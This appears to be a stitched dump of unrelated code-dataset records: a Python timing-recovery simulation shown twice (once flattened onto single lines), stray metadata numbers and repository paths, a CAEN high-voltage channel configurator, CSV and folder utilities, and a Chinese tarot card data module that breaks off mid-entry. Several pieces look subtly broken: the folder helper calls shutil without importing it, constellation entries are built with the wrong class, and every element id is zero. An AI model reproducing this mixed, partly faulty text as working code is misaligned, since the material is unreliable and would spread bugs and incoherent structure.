    time, pulse_resp = chan.get_pulse_resp()
    plt.plot(time, pulse_resp)
    plt.stem(time, adc(pulse_resp) / (2**(adc_bits - 1.0)),
             use_line_collection=True, linefmt='r-')
    plt.show()

    # Sweep the channel delay to visualize how the pulse response shifts.
    for ii in range(10):
        chan.adjust_delay(initial_timing + 0.05e-9 * ii)
        time, pulse_resp = chan.get_pulse_resp(t_delay=initial_timing + 0.05e-9 * ii)
        plt.stem(time, pulse_resp, use_line_collection=True)
        print(time[0:5])
    plt.show()

    timing_history = np.zeros((num_iterations, 1))
    adjust_history = np.zeros((num_iterations, 1))
    error_history = np.zeros((num_iterations, 1))
    mean_history = np.zeros((num_iterations, 1))

    # Closed-loop simulation: detect timing error on random data, integrate,
    # and feed the correction back into the channel delay.
    for ii in range(num_iterations):
        data = np.random.randint(2, size=(256,)) * 2 - 1
        code = adc(chan.compute_output(data))[:-response_depth + 2] * 1.0
        cdr_estimate = cdr.calculate_timing_error(code)
        int_and_dump = np.sum(cdr_estimate) / (2**(adc_bits - 1)) * 0.5
        current_timing -= int_and_dump
        mean_history[ii] = np.sum(code) / 16.0
        # Timing correction is applied in integer steps of 0.8 ps.
        timing_history[ii] = int(current_timing) * 0.8e-12
        adjust_history[ii] = int_and_dump
        chan.adjust_delay(initial_timing + int(current_timing) * 0.8e-12)
        __, pulse_resp = chan.get_pulse_resp()
        # Residual error metric: asymmetry around the main cursor.
        cursor_position = np.where(pulse_resp == np.amax(pulse_resp))[0]
        error_history[ii] = (pulse_resp[cursor_position + 1] - pulse_resp[cursor_position - 1]) / (pulse_resp[cursor_position])

    plt.plot(timing_history / 0.8e-12)
    plt.show()
    plt.plot(20 * np.log10(np.abs(adjust_history)))
    #plt.plot(error_history )
    #plt.show()
    plt.plot(20 * np.log10(np.abs(error_history)))
    plt.show()
    #plt.plot(adjust_history/np.max(np.abs(adjust_history)))
    #plt.plot(mean_history/np.max(np.abs(mean_history)))
    #plt.show()

    time, pulse_resp = chan.get_pulse_resp()
    plt.plot(time, pulse_resp)
    plt.show()
import numpy as np from dragonphy import Channel, DelayChannel, StaticQuantizer from dragonphy.channel import calculate_channel_loss import matplotlib.pyplot as plt class Cdr: def __init__(self, cdr_type='sign_mm'): self.cdr_timing_error[cdr_type](self) def cal_mm_timing_error(self, data): sign_data = np.where(data > 0, 1, -1) timing_errors = np.multiply(sign_data[2:] - sign_data[:-2], data[1:-1]) return timing_errors def cal_perfect_mm_timing_error(self, data, bits): timing_errors = np.multiply(bits[2:] - bits[:-2], data[1:-1]) return timing_errors def set_mm_timing_error(self): self.calculate_timing_error = self.cal_mm_timing_error def set_pmm_timing_error(self): self.calculate_timing_error = self.cal_perfect_mm_timing_error cdr_timing_error = { 'sign_mm' : set_mm_timing_error, 'perf_mm' : set_pmm_timing_error} if __name__ == "__main__": initial_timing = 5.8e-9 current_timing = 0 response_depth = 256 num_iterations = 50000 adc_bits = 16 cdr_bits = 16 cdr = Cdr() adc = StaticQuantizer(width=adc_bits, full_scale=1.0) chan = DelayChannel( channel_type='arctan', sampl_rate=1e9, resp_depth=response_depth, tau=3e-9, t_delay=initial_timing ) time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.stem(time, adc(pulse_resp)/(2**(adc_bits-1.0)), use_line_collection=True, linefmt='r-') plt.show() for ii in range(10): chan.adjust_delay(initial_timing + 0.05e-9 * ii) time, pulse_resp = chan.get_pulse_resp(t_delay=initial_timing + 0.05e-9 * ii) plt.stem(time, pulse_resp, use_line_collection=True) print(time[0:5]) plt.show() timing_history = np.zeros((num_iterations,1)) adjust_history = np.zeros((num_iterations,1)) error_history = np.zeros((num_iterations,1)) mean_history = np.zeros((num_iterations,1)) for ii in range(num_iterations): data = np.random.randint(2, size=(256,))*2-1 code = adc(chan.compute_output(data))[:-response_depth+2]*1.0 cdr_estimate = cdr.calculate_timing_error(code) int_and_dump = np.sum(cdr_estimate) / (2**(adc_bits-1)) * 0.5 
current_timing -= int_and_dump mean_history[ii] = np.sum(code) / 16.0 timing_history[ii] = int(current_timing)*0.8e-12 adjust_history[ii] = int_and_dump chan.adjust_delay(initial_timing + int(current_timing)*0.8e-12) __, pulse_resp = chan.get_pulse_resp() cursor_position = np.where(pulse_resp == np.amax(pulse_resp))[0] error_history[ii] = (pulse_resp[cursor_position+1] - pulse_resp[cursor_position-1])/(pulse_resp[cursor_position]) plt.plot(timing_history/0.8e-12) plt.show() plt.plot(20*np.log10(np.abs(adjust_history))) #plt.plot(error_history ) #plt.show() plt.plot(20*np.log10(np.abs(error_history))) plt.show() #plt.plot(adjust_history/np.max(np.abs(adjust_history))) #plt.plot(mean_history/np.max(np.abs(mean_history))) #plt.show() time, pulse_resp = chan.get_pulse_resp() plt.plot(time, pulse_resp) plt.show()
en
0.140725
#plt.plot(error_history ) #plt.show() #plt.plot(adjust_history/np.max(np.abs(adjust_history))) #plt.plot(mean_history/np.max(np.abs(mean_history))) #plt.show()
2.476067
2
src/pycaenhv/config/configurator.py
vasoto/pycaenhv
0
6618640
import logging from typing import Dict, Any, Optional, Union from ..context import HVContext from ..helpers import get_channel_parameter, check_channel_parameter_value from ..wrappers import set_channel_parameter, get_crate_map from .enitites import HVBase, Channel logger = logging.getLogger(__name__) class ChannelConfigurator: def __init__(self, config: HVBase) -> None: self.config = config self.context: Union[HVContext, None] = None self._channels_count: Union[int, None] = None self.crate_map: Union[Dict[str, Any], None] = None def initialize(self): logger.info("Initialize configurator") arg = self.config.address logger.debug("Board=%s Link=%s Argument=%s", self.config.board, self.config.link.name, str(arg)) self.context = HVContext(system=self.config.board, link=self.config.link.name, argument=arg) self.context.start() self.crate_map = get_crate_map(self.context.handle) logger.debug("Configurator initialized. Found %d channels", self.crate_map['channels'][self.config.slot]) def finish(self): self.context.close() logger.info("Configurator finished") @property def channels_count(self) -> int: """ Get the number of channels in the module """ if self.crate_map is None: self.initialize() return self.crate_map['channels'][self.config.slot] def _set_param(self, channel: int, parameter: str, value: Any) -> None: current_state = get_channel_parameter(self.context.handle, self.config.slot, channel, "Pw") if value != current_state: if not check_channel_parameter_value( self.context.handle, self.config.slot, channel, parameter, value): msg = f"Value for parameter {parameter} ({value}) is out of the allowed range." logger.error(msg) raise ValueError(msg) set_channel_parameter(self.context.handle, self.config.slot, channel, parameter, value) logger.debug("Parameter %s for channel %d set to %s", parameter, channel, str(value)) else: logger.debug( "Channel %d parameter %s already set to %s. 
Skipping...", channel, parameter, str(value)) def _apply_config(self, channel: int, config: Channel) -> None: """ Apply channel configuration """ logger.debug("Applying configuration") parameters = config.dict(exclude_none=True) # Exclude unset fields for param, value in parameters.items(): self._set_param(channel=channel, parameter=param, value=value) def configure(self): if self.context is None: raise ValueError("Context is not set, please initialize") channels_config = self.config.channels defaults = channels_config.default or {} configs = channels_config.channels or {} for channel in range(self.channels_count): conf = configs.get(channel, defaults) self._apply_config(channel, conf) def _switch_channel(self, channel: int, switch: bool): _switch = int(switch) self._set_param(channel, "Pw", _switch) def switch(self, value: bool): logger.info("Switch channels %s", {True: "ON", False: "OFF"}[value]) for channel in range(self.channels_count): self._switch_channel(channel=channel, switch=value)
import logging from typing import Dict, Any, Optional, Union from ..context import HVContext from ..helpers import get_channel_parameter, check_channel_parameter_value from ..wrappers import set_channel_parameter, get_crate_map from .enitites import HVBase, Channel logger = logging.getLogger(__name__) class ChannelConfigurator: def __init__(self, config: HVBase) -> None: self.config = config self.context: Union[HVContext, None] = None self._channels_count: Union[int, None] = None self.crate_map: Union[Dict[str, Any], None] = None def initialize(self): logger.info("Initialize configurator") arg = self.config.address logger.debug("Board=%s Link=%s Argument=%s", self.config.board, self.config.link.name, str(arg)) self.context = HVContext(system=self.config.board, link=self.config.link.name, argument=arg) self.context.start() self.crate_map = get_crate_map(self.context.handle) logger.debug("Configurator initialized. Found %d channels", self.crate_map['channels'][self.config.slot]) def finish(self): self.context.close() logger.info("Configurator finished") @property def channels_count(self) -> int: """ Get the number of channels in the module """ if self.crate_map is None: self.initialize() return self.crate_map['channels'][self.config.slot] def _set_param(self, channel: int, parameter: str, value: Any) -> None: current_state = get_channel_parameter(self.context.handle, self.config.slot, channel, "Pw") if value != current_state: if not check_channel_parameter_value( self.context.handle, self.config.slot, channel, parameter, value): msg = f"Value for parameter {parameter} ({value}) is out of the allowed range." logger.error(msg) raise ValueError(msg) set_channel_parameter(self.context.handle, self.config.slot, channel, parameter, value) logger.debug("Parameter %s for channel %d set to %s", parameter, channel, str(value)) else: logger.debug( "Channel %d parameter %s already set to %s. 
Skipping...", channel, parameter, str(value)) def _apply_config(self, channel: int, config: Channel) -> None: """ Apply channel configuration """ logger.debug("Applying configuration") parameters = config.dict(exclude_none=True) # Exclude unset fields for param, value in parameters.items(): self._set_param(channel=channel, parameter=param, value=value) def configure(self): if self.context is None: raise ValueError("Context is not set, please initialize") channels_config = self.config.channels defaults = channels_config.default or {} configs = channels_config.channels or {} for channel in range(self.channels_count): conf = configs.get(channel, defaults) self._apply_config(channel, conf) def _switch_channel(self, channel: int, switch: bool): _switch = int(switch) self._set_param(channel, "Pw", _switch) def switch(self, value: bool): logger.info("Switch channels %s", {True: "ON", False: "OFF"}[value]) for channel in range(self.channels_count): self._switch_channel(channel=channel, switch=value)
en
0.607986
Get the number of channels in the module Apply channel configuration # Exclude unset fields
2.268797
2
code/Sense2StopSync_sim_shift/src/utils.py
HAbitsLab/SyncWISE
0
6618641
<reponame>HAbitsLab/SyncWISE<filename>code/Sense2StopSync_sim_shift/src/utils.py<gh_stars>0 import os import csv import numpy as np import pandas as pd def create_folder(f, deleteExisting=False): ''' Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. ''' if os.path.exists(f): if deleteExisting: shutil.rmtree(f) else: os.makedirs(f) def csv_read(path): with open(path) as fd: rd = csv.reader(fd) header = next(rd) # initialize column names from first row next_key = 0 # additional columns will start at '0' data = {k: list() for k in header} # initialize data list per column for row in rd: while len(row) > len(header): # add eventual new columns header.append(str(next_key)) data[header[-1]] = [np.nan] * len(data[header[0]]) next_key += 1 # increase next column name # eventually extend the row up to the header size row.extend([np.nan] * (len(header) - len(row))) # and add data to the column lists for i, k in enumerate(header): data[k].append(row[i]) # data is now in a dict format, suitable to feed DataFrame return pd.DataFrame(data)
import os import csv import numpy as np import pandas as pd def create_folder(f, deleteExisting=False): ''' Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. ''' if os.path.exists(f): if deleteExisting: shutil.rmtree(f) else: os.makedirs(f) def csv_read(path): with open(path) as fd: rd = csv.reader(fd) header = next(rd) # initialize column names from first row next_key = 0 # additional columns will start at '0' data = {k: list() for k in header} # initialize data list per column for row in rd: while len(row) > len(header): # add eventual new columns header.append(str(next_key)) data[header[-1]] = [np.nan] * len(data[header[0]]) next_key += 1 # increase next column name # eventually extend the row up to the header size row.extend([np.nan] * (len(header) - len(row))) # and add data to the column lists for i, k in enumerate(header): data[k].append(row[i]) # data is now in a dict format, suitable to feed DataFrame return pd.DataFrame(data)
en
0.729216
Create the folder Parameters: f: folder path. Could be nested path (so nested folders will be created) deleteExising: if True then the existing folder will be deleted. # initialize column names from first row # additional columns will start at '0' # initialize data list per column # add eventual new columns # increase next column name # eventually extend the row up to the header size # and add data to the column lists # data is now in a dict format, suitable to feed DataFrame
3.547161
4
omega_miya/plugins/tarot/tarot_data.py
rinrini001/omega-miya
120
6618642
""" @Author : Ailitonia @Date : 2021/08/31 21:24 @FileName : tarot_data.py @Project : nonebot2_miya @Description : 塔罗卡牌及卡组数据 虽然这里看起来使用 json 会更好 但还是用 dataclass 硬编码了:( @GitHub : https://github.com/Ailitonia @Software : PyCharm """ from typing import List from dataclasses import dataclass, field, fields from .tarot_typing import Element, Constellation, TarotCard, TarotPack @dataclass class Elements: earth: Element = field(default=Element(id=0, orig_name='Earth', name='土元素'), init=False) water: Element = field(default=Element(id=0, orig_name='Water', name='水元素'), init=False) air: Element = field(default=Element(id=0, orig_name='Air', name='风元素'), init=False) fire: Element = field(default=Element(id=0, orig_name='Fire', name='火元素'), init=False) aether: Element = field(default=Element(id=0, orig_name='Aether', name='以太'), init=False) @dataclass class Constellations: pluto: Constellation = field(default=Element(id=-9, orig_name='Pluto', name='冥王星'), init=False) neptunus: Constellation = field(default=Element(id=-8, orig_name='Neptunus', name='海王星'), init=False) uranus: Constellation = field(default=Element(id=-7, orig_name='Uranus', name='天王星'), init=False) saturn: Constellation = field(default=Element(id=-6, orig_name='Saturn', name='土星'), init=False) jupiter: Constellation = field(default=Element(id=-5, orig_name='Jupiter', name='木星'), init=False) mars: Constellation = field(default=Element(id=-4, orig_name='Mars', name='火星'), init=False) earth: Constellation = field(default=Element(id=-3, orig_name='Earth', name='地球'), init=False) moon: Constellation = field(default=Element(id=-10, orig_name='Moon', name='月亮'), init=False) venus: Constellation = field(default=Element(id=-2, orig_name='Venus', name='金星'), init=False) mercury: Constellation = field(default=Element(id=-1, orig_name='Mercury', name='水星'), init=False) sun: Constellation = field(default=Element(id=0, orig_name='Sun', name='太阳'), init=False) aries: Constellation = field(default=Element(id=1, 
orig_name='Aries', name='白羊座'), init=False) taurus: Constellation = field(default=Element(id=2, orig_name='Taurus', name='金牛座'), init=False) gemini: Constellation = field(default=Element(id=3, orig_name='Gemini', name='双子座'), init=False) cancer: Constellation = field(default=Element(id=4, orig_name='Cancer', name='巨蟹座'), init=False) leo: Constellation = field(default=Element(id=5, orig_name='Leo', name='狮子座'), init=False) virgo: Constellation = field(default=Element(id=6, orig_name='Virgo', name='室女座'), init=False) libra: Constellation = field(default=Element(id=7, orig_name='Libra', name='天秤座'), init=False) scorpio: Constellation = field(default=Element(id=8, orig_name='Scorpio', name='天蝎座'), init=False) sagittarius: Constellation = field(default=Element(id=9, orig_name='Sagittarius', name='人马座'), init=False) capricorn: Constellation = field(default=Element(id=10, orig_name='Capricorn', name='摩羯座'), init=False) aquarius: Constellation = field(default=Element(id=11, orig_name='Aquarius', name='宝瓶座'), init=False) pisces: Constellation = field(default=Element(id=12, orig_name='Pisces', name='双鱼座'), init=False) @dataclass class TarotCards: """ 所有卡牌 每个属性都是一张牌 """ @classmethod def get_all_cards(cls) -> List[TarotCard]: """ 获取所有塔罗牌的列表 :return: List[TarotCard] """ return [field_.default for field_ in fields(cls) if field_.type == TarotCard] blank: TarotCard = field(default=TarotCard( id=-1, index='blank', type='special', orig_name='Blank', name='空白', intro='空白的卡面,似乎可以用来作为卡牌背面图案使用', words='', desc='', upright='', reversed='' ), init=False) the_fool: TarotCard = field(default=TarotCard( id=0, index='the_fool', type='major_arcana', orig_name='The Fool', name='愚者', intro='愚人穿着色彩斑斓的服装,头上戴顶象征成功的桂冠,无视于前方的悬崖,昂首阔步向前行。\n\n他左手拿着一朵白玫瑰,白色象征纯洁,玫瑰象征热情。他的右手则轻轻握着一根杖,象征经验的包袱即系于其上。那根杖可不是普通的杖,它是一根权杖,象征力量。愚人脚边有只小白狗正狂吠着,似乎在提醒他要悬崖勒马,又好像随他一同起舞。无论如何,愚人仍旧保持着欢欣的神色,望向遥远的天空而非眼前的悬崖,好像悬崖下会有个天使扥住他似的,他就这样昂首阔步地向前走。远方的山脉象征他前方未知的旅程,白色的太阳自始至终都目睹着愚人的一举一动──他从哪里来?他往何处去?他又如何回来?', words='流浪', 
desc='愚人牌暗示着你现在不顾风险而有所行动。\n\n愚人是一张代表自发性行为的牌,一段跳脱某种状态的日子,或尽情享受眼前日子的一段时光。对旅游而言,这是一张积极的牌,暗示你将会活在当下,并且会有和生命紧密结合的感觉。“每天都充实,乐趣便在其中”是一句很适合这张牌的古谚语。当你周遭的人都对某事提防戒慎,你却打算去冒这个险时,愚人牌可能就会出现。\n\n愚人暗示通往满足之路是经由自发的行动,而长期的计划则是将来的事。', upright='盲目的、有勇气的、超越世俗的、展开新的阶段、有新的机会、追求自我的理想、展开一段旅行、超乎常人的勇气、漠视道德舆论的。', reversed='过于盲目、不顾现实的、横冲直撞的、拒绝负担责任的、违背常理的、逃避的心态、一段危险的旅程、想法如孩童般天真幼稚的。' ), init=False) the_magician: TarotCard = field(default=TarotCard( id=1, index='the_magician', type='major_arcana', orig_name='The Magician (I)', name='魔术师', intro='魔术师高举拿着权杖的右手指向天,左手食指指向地,他本人就是沟通上天与地面的桥梁。他身前的桌上放着象征四要素的权杖、圣杯、宝剑与星币,同时也代表塔罗牌的四个牌组。他身穿的大红袍子象征热情与主动,白色内衫表示纯洁与智慧的内在。缠绕他腰间的是一条青蛇,蛇虽然经常象征邪恶,但在这里代表的是智慧与启发。魔术师头顶上有个倒8符号,代表无限。画面前方和上方的红玫瑰象征热情,白百合象征智慧。此时,万事齐备,魔术师可以开始进行他的新计划了。和愚人牌同样鲜黄色的背景,预示未来成功的可能。', words='创造', desc='魔术牌意味着:现在是展开新计划的好时机。\n\n魔术师这张牌意味这是个着手新事物的适当时机。对的时间、对的机会、对的动机,使你的努力值回票价。对于展开行动、实现计划而言,这正是一个良好时机。由于你已为实现计划扎下良好基础,所以新的冒险很可能会实现。清楚的方向感和意志力的贯彻,大大的提升了成功的可能性。', upright='成功的、有实力的、聪明能干的、擅长沟通的、机智过人的、唯我独尊的、企划能力强的、透过更好的沟通而获得智慧、运用智慧影响他人、学习能力强的、有教育和学术上的能力、表达技巧良好的。', reversed='变魔术耍花招的、瞒骗的、失败的、狡猾的、善于谎言的、能力不足的、丧失信心的、以不正当手段获取认同的。' ), init=False) the_high_priestess: TarotCard = field(default=TarotCard( id=2, index='the_high_priestess', type='major_arcana', orig_name='The High Priestess (II)', name='女祭司', intro='相较于上一张魔术师纯粹阳性的力量,女祭司表现的则是纯粹阴性的力量。她身穿代表纯洁的白色内袍,与圣母的蓝色外袍,静默端坐。胸前挂个十字架,象征阴阳平衡、与神合一。\n\n她头戴的帽子是由上弦月、下弦月和一轮满月所构成的,象征所有的处女神祇。手上拿着滚动条,象征深奥的智慧,其上的TORA字样,意为“神圣律法”,而滚动条卷起并半遮着,暗示此律法不为人所知。在她脚边的一轮新月,为她的内袍衣角所固定住,袍子并延伸到图面之外。女祭司两侧一黑一白的柱子,存在于圣经故事中所罗门王在耶路撒冷所建的圣殿中,黑白柱上的B与J字样,分别是Boas和Jachin的缩写,黑柱是阴而白柱是阳,两柱象征二元性,坐在中间的女祭司则不偏不倚,统合两者的力量。柱子上面的喇叭造型,代表女祭司敏锐的感受性,上面的百合花纹则象征纯洁与和平。两柱之间有帷幕遮着,帷幕上的石榴代表“阴”,棕榈代表“阳”。帷幕把后方的景色遮住了,仔细一看,依稀可见由水、山丘与的蓝天构成的背景。水象征情感与潜意识,这一片水平静无波,但其静止的表面下蕴藏深沉的秘密。整个图面呈现象征智慧的蓝色调,双柱的意象在后面的牌中重复出现。', words='智慧', 
desc='女祭司意味着:这是向内探索、沉思,或按兵不动的时刻。\n\n女祭司代表去思考可以导致实际结果的构想。这并不是一张代表具体事物的牌,而是一张代表可能性的牌。我们每个人都在我们的人生当中持续的耕耘和收获,而女祭司就是散播那些种子或理念的行动。\n\n女祭司暗示你应该要相信你的直觉,因为在这一点上,有些东西你可能看不见。高位的女祭司是一张代表精神和心灵发展的牌。它代表了向内心探索的一段时期,以便为你人生的下一个阶段播种,或者去消化你在肉体的层次上所处理的事情。', upright='纯真无邪的、拥有直觉判断能力的、揭发真相的、运用潜意识的力量、掌握知识的、正确的判断、理性的思考、单恋的、精神上的恋爱、对爱情严苛的、回避爱情的、对学业有助益的。', reversed='冷酷无情的、无法正确思考的、错误的方向、迷信的、无理取闹的、情绪不安的、缺乏前瞻性的、严厉拒绝爱情的。' ), init=False) the_empress: TarotCard = field(default=TarotCard( id=3, index='the_empress', type='major_arcana', orig_name='The Empress (III)', name='女皇', intro='体态丰腴的皇后坐在宝座上,手持象征地球的圆形手杖,戴着由九颗珍珠组成的项链,象征九颗行星,也代表金星维纳斯。皇后头冠由十二个六角星组成,象征十二星座与一年的十二个月。更进一步,六角星本身是由一个正三角形和倒三角形组成,分别代表火要素和水要素。除了头冠之外,她还戴着香桃木叶作成的头环,象征金星维纳斯。她身穿的宽松袍子上面画满象征多产的石榴,宝座下方则是个绘有金星符号的心形枕头。她前方的麦田已经成熟,代表丰饶与多产;后方则是茂密的丝柏森林,与象征生命力的瀑布河流。', words='丰收', desc='女皇牌暗示家庭和谐及稳定。\n\n简单言之,女皇可能意味着实现计划,或朝向计划的下一个自然步骤迈进,亦即你又向目标靠近了一步。女皇牌也可能暗示一趟乡野之旅,或是休息一阵子并重返大自然的怀抱,因为她四周围绕着自然的产物。透过亲近自然,现在是你重新平衡自己的时候。这张牌意味家庭状态的稳定与和谐,而这通常是透过把爱从思考当中,带往内心来达成的。', upright='温柔顺从的、高贵美丽的、享受生活的、丰收的、生产的、温柔多情的、维护爱情的、充满女性魅力的、具有母爱的、有创造力的女性、沈浸爱情的、财运充裕的、快乐愉悦的。', reversed='骄傲放纵的、过度享乐的、浪费的、充满嫉妒心的、母性的独裁、占有欲、败家的女人、挥霍无度的、骄纵的、纵欲的、为爱颓废的、不正当的爱情、不伦之恋、美丽的诱惑。' ), init=False) the_emperor: TarotCard = field(default=TarotCard( id=4, index='the_emperor', type='major_arcana', orig_name='The Emperor (IV)', name='皇帝', intro='一国之尊的皇帝头戴皇冠,身着红袍,脚穿象征严格纪律的盔甲,左手拿着一颗球,右手持的是象征生命的古埃及十字架,自信满满的坐在王位上。\n\n王位上有四个牡羊头作为装饰,如图所示,皇帝牌正是代表牡羊座的牌。牡羊座是十二星座的头一个,具有勇敢、积极、有野心、有自信的特质。红袍加上橙色的背景,呈现红色的主色调,与牡羊座的特性不谋而合。背景严峻的山象征前方险峻的路途。我们可以比较皇帝与皇后的背景,一个是严峻山川,一个是丰饶大地,形成互补的局面。', words='支配', desc='皇帝表示一种训练和实际致力于生活。\n\n皇帝意味透过自律和实际的努力而达到成功。它可以代表你生活中一段相当稳定,且井然有序的时光。这张牌可以暗示遭遇到法律上的问题,或是碰到某个地位、权利都在你之上的人,例如法官、警员、父亲,或具有父亲形象的人。\n\n为了成功,现在正是你采取务实态度来面对人生的时候。你被周遭的人设下种种限制,但只要你能在这些限制之内努力的话,你还是可以达成你的目标。', upright='事业成功、物质丰厚、掌控爱情运的、有手段的、有方法的、阳刚的、独立自主的、有男性魅力的、大男人主义的、有处理事情的能力、有点独断的、想要实现野心与梦想的。', reversed='失败的、过于刚硬的、不利爱情运的、自以为是的、权威过度的、力量减弱的、丧失理智的、错误的判断、没有能力的、过于在乎世俗的、权力欲望过重的、权力使人腐败的、徒劳无功的。' ), init=False) the_hierophant: TarotCard = 
field(default=TarotCard( id=5, index='the_hierophant', type='major_arcana', orig_name='The Hierophant (V)', name='教皇', intro='教皇身穿大红袍子,端坐在信众前。他头戴象征权力的三层皇冠,分别代表身心灵三种层次的世界。\n\n他的右手食中指指向天,象征祝福﹔左手持着主字形的权杖,象征神圣与权力。他耳朵旁边垂挂的白色小物,代表内心的声音。教皇前方放着两把交叉的钥匙,在很多版本的塔罗牌里,钥匙是金色银色各一把,象征阳与阴,日与月,外在与内在,我们的课题就是要学会如何结合两者,而钥匙本身可用以开启智慧与神秘之门。教皇前方的两位信众,左边的身穿象征热情的红玫瑰花纹衣裳,右边则穿象征性灵成长的白百合衣裳(红玫瑰与白百合在魔术师也曾出现过)。教皇与信众三人的衣服都有牛轭形(Y字形)装饰,牛轭的用途是促使受过训练的动物去工作的,出现在教皇牌的道理值得深思。教皇后方则是曾经在女祭司中出现的两根柱子,不过在这里它们是灰色的,灰色象征由经验而来的智慧﹔另一说则是教皇后方虽无女祭司的帷幕将潜意识隔离,但暗沉的灰色代表通往潜意识之路仍未开启。柱子上的图案象征肉体结合。', words='援助', desc='教皇代表需要为你的心灵成长,及人生方向付起责任。\n\n教皇暗示你向某人或某个团体的人屈服了。或许这正是你为自己,及心灵上的需求负起责任的时刻了。你目前的行事作风并非应付事情的唯一方式,假设你愿意加以探索的话,或许你就会找到新的可能。', upright='有智慧的、擅沟通的、适时的帮助、找到真理、有精神上的援助、得到贵人帮助、一个有影响力的导师、找到正确的方向、学业出现援助、爱情上出现长辈的干涉、媒人的帮助。', reversed='过于依赖的、错误的指导、盲目的安慰、无效的帮助、独裁的、疲劳轰炸的、精神洗脑的、以不正当手段取得认同的、毫无能力的、爱情遭破坏、第三者的介入。' ), init=False) the_lovers: TarotCard = field(default=TarotCard( id=6, index='the_lovers', type='major_arcana', orig_name='The Lovers (VI)', name='恋人', intro='恋人牌背景在伊甸园,亚当与夏娃分站两边,两者皆裸身,代表他们没什么需要隐藏的。两人所踩的土地相当肥沃,生机盎然。\n\n夏娃的背后是知识之树,生有五颗苹果,象征五种感官,有条蛇缠绕树上。蛇在世界文化中的象征丰富多元,此处可能象征智慧,也象征欲望与诱惑。牠由下往上缠绕在树上,暗示诱惑经常来自潜意识。亚当背后是生命之树,树上有十二团火焰,象征十二星座,也象征欲望之火。伟特说:“亚当与夏娃年轻诱人的躯体,象征未受有形物质污染之前的青春、童贞、纯真和爱”。两人背后的人物是风之天使拉斐尔(Raphael),风代表沟通,祂身穿的紫袍则是忠贞的象征,显示这个沟通的重要性。亚当看着夏娃,夏娃则望着天使,象征“意识─潜意识─超意识”与“身─心─灵”或是“理性─感性”之间的传导。天使之下,亚当夏娃中间有一座山,象征意义解读众多,主要有三种:一说是山代表阳性,水代表阴性,两者表现阴阳平衡,意味我们必须把阴与阳、理性与感性的能量调和。一说认为这座山象征正当思想的丰饶果实。另一说则认为它代表高峰经验与极乐。', words='结合', desc='恋人牌意味,为了爱的关系而做的某些决定。\n\n恋人是一张代表决定的牌,而且除非问的是某个特定的问题,否则它通常是指有关两性关系的决定。它可能是在描述沉浸在爱恋之中的过程,因为它可以意指一段两性关系中的最初,或者是罗曼蒂克的阶级。恋人牌也可以形容在决定到底要保留就有的关系,或转进新关系当中。它暗示你已经由过去经验而得到成长了,因此你可以安全的迈向一个新的阶段。', upright='爱情甜蜜的、被祝福的关系、刚萌芽的爱情、顺利交往的、美满的结合、面临工作学业的选择、面对爱情的抉择、下决定的时刻、合作顺利的。', reversed='遭遇分离、有第三者介入、感情不合、外力干涉、面临分手状况、爱情已远去、无法结合的、遭受破坏的关系、爱错了人、不被祝福的恋情、因一时的寂寞而结合。' ), init=False) the_chariot: TarotCard = field(default=TarotCard( id=7, index='the_chariot', type='major_arcana', orig_name='The Chariot (VII)', name='战车', 
intro='一位英勇的战士驾着一座由两只人面狮身兽拉着的战车。人面狮身兽一只是黑的,代表严厉,另一只是白的,代表慈悲。两兽同时来看,也是阴阳平衡的象征。\n\n战车上有四根柱子(四个代表上帝的希伯来字母YHWH或火水风土四要素)支撑着蓝色车棚,车棚上饰以六角星花纹,象征天体对战士成功的影响。英勇的战士手持象征意志与力量的矛形权杖,头戴象征统治的八角星头冠和象征胜利的桂冠,身穿盔甲。盔甲上的肩章呈现弦月形,显示战车牌与属月亮的巨蟹座之关联。斜挂的腰带上有占星学符号,裙上有各种炼金术的符号。胸前的四方形图案代表土要素,象征意志的力量。战车前方的翅膀图案是古埃及的图腾,代表灵感。翅膀下面是一个小盾牌,其上的红色的图案是一种印度图腾,为男性与女性生殖器结合的象征,也是二元性与一元性,类似中国的阴与阳,可能暗示编号七的战车牌走过愚人之旅的三分之一,已达性成熟的阶段。战士身后的河流就是圣经创世纪中四条伊甸园之河其中的一条,与皇后、皇帝和、死神牌中的河是同一条。再后面就是一座高墙耸立的城市。战士背对城市,暗示他把物质置于身后,向前开展心灵上的旅程。他手上没有缰绳,表示他不是用肉体来控制那两头朝不同方向行进的人面狮身兽,而完全凭借他旺盛过人的意志力。值得注意的一点是他站在城墙外守御,而非进攻,所以这位战士是位守护者、防御者,而不是侵略者。他是尽他的本分,并努力做到最好。', words='胜利', desc='战车牌意味训练有素的心智。\n\n战车可以代表一部车,或是坐车旅行。当这张牌出现时,它可能意味着你需要控制生命中互相对抗的力量。目前的情况可能会出现某些矛盾,而你正以理智在控制着它们。\n\n这是一张代表由于坚持而取得成功的牌。如果用来形容一个人的话,战车是暗示这个人(通常是指男人),掌控着她自己和周遭的事物。正立的战车也可能意指一桩重要的生意,或意义重大的成功。', upright='胜利的、凯旋而归的、不断的征服、有收获的、快速的解决、交通顺利的、充满信心的、不顾危险的、方向确定的、坚持向前的、冲劲十足的。', reversed='不易驾驭的、严重失败、交通意外、遭遇挫折的、遇到障碍的、挣扎的、意外冲击的、失去方向的、丧失理智的、鲁莽冲撞的。' ), init=False) strength: TarotCard = field(default=TarotCard( id=8, index='strength', type='major_arcana', orig_name='Strength (VIII)', name='力量', intro='代表力量的女人轻柔地合上狮子的嘴。女人头上有魔术师牌中出现的倒8符号,象征她的力量是无穷尽的。她头上戴着花环,腰间也系着花环,而且腰间花环还连系在狮子颈间,形成第二个倒8符号。狮子身体微倾,尾巴轻垂,表现出彻底的顺服,还伸出舌头来舔着女人的手。', words='意志', desc='力量牌暗示你拥有足够的内在力量去面对人生。\n\n这张力量牌意味你有能力面对生活和困难的环境,或者有能力以希望、内在力量及勇气去做改变。勇气并不代表你没有恐惧,而是虽然你有恐惧,你还是愿意对某人或某事有所承诺。\n\n这张牌象征你拥有内在的力量来面对你内在的恐惧和欲望,而非让它们屈服于你的意志。在健康的分析方面,这张牌可能是有关心脏或脊椎方面的毛病,不过这些毛病也可以透过内在能量来克服,而且这张牌也暗示你本身拥有这种能量。', upright='内在的力量使成功的、正确的信心、坦然的态度、以柔克刚的力量、有魅力的、精神力旺盛、有领导能力的、理性的处理态度、头脑清晰的。', reversed='丧失信心的、失去生命力的、沮丧的、失败的、失去魅力的、无助的、情绪化的、任性而为的、退缩的、没有能力处理问题的、充满负面情绪的。' ), 